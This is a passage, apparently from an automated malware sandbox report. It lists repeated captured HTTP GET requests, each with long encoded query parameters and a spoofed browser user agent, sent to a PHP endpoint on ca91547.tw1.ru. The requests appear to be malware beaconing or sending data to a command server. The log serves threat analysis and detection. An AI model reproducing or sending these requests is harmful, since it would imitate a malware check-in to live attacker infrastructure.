9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 